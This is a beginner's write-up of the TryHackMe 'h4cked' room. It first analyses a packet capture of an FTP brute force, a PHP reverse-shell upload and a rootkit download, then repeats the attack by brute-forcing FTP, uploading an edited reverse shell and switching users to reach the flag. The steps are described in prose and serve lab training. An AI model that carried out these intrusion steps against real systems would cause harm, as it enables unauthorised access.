h4cked machine writeup | TryHackMe
Hello friends,
my name is Karim, and i am here now to clear to you how i have pwned h4cked machine at tryhackme.
this machine is very unique because it is a combination between network forensics and basic penetration testing skills.
machine link: https://tryhackme.com/room/h4cked
prerequisites: 1- basic network skills such as , knowing the usage of wireshark and knowing different network protocols like ftp, HTTP, HTTPS
2- knowing the basics of penetration testing like reverseshell, backdoor and privilege escalation.
okay, let’s start our walk-through in this machine. this machine consists from two tasks and we will start with task 1 and we will analyze network packets to know how attackers hacked our machine.
let’s go to answer task 1 questions……
we will see pcap file attached to the first task, download it and open it in wireshark.
if we go through the packets, we will notice the attacker tries to connect to service named “FTP”, so right click at any packet , then follow -> tcp stream.
we will notice that the attacker entered the wrong password a lot of times, so let’s search for the correct ftp credentials in the pcap file.
if we have the basics knowledge about ftp protocol, we will know that ftp shows “login successful” message by default if the credentials is correct.
after we found the packet we search for , repeat the previous steps — Right click -> follow -> tcp stream.
Booom!!! fantastic , we found the credentials that the attacker used to connect to ftp.
now, we should think about what the attacker does after connect to ftp.
now, we will go through deeper in the packets till we notice the activity that the attackers does , and we will notice that in info column at wireshark.
WoW…. the attacker uploaded php file to our system and he can get reverseshell to our system through it.
now, we want to take a last look at our packets to know the harmful activities that the attacker does in our system.
here, we saw that the attacker succeeded to get reverse shell to our system and he wrote some commands.
now, he downloaded file from https://github.com/f0rb1dd3n/Reptile that it may be harmful and after we search about this file and do some googling, we found that it is some-type from backdoors specifically rootkits and it helps the attacker to escalate his privileges on the system.
here, we will find the the attacker failed to escalate his privileges.
WoW, you did it, man , you succeeded to solve the first task, i’m so excited to end the second task with you. let’s continue with the same passion.
now, we want to simulate this attack with our own methodology, but before we start, the challenge creator told us that the attacker changed the user’s password for ftp service.
— first of all , we will do brute force attack to know the new password.
yes, you found the correct new credentials for ftp, let’s try to connect to it.
we saw the file that attacker uploaded to get reverseshell. let’s download it and take a look in the file then edit it with “your ip , and listening port” to get your own reverseshell.
upload the new php file to ftp server and open listening port in your terminal , and you can get your revesreshell if you go to browser and go to http://{machine_ip}/{file_name}
after we go to the url mentioned above, we will get the shell.
after we manged to get into the system , we will try to escalate our privileges on the system.
first thing i wrote “ sudo -l ” command to show permitted sudoers commands to user but it is unuseful.
but, i saw that i get the shell with www-data user not jenny user so i tried to login with jenny creds and it worked and we reached to flag.
WoW, it was a long journey but we learned a lot of new skills.
thank you
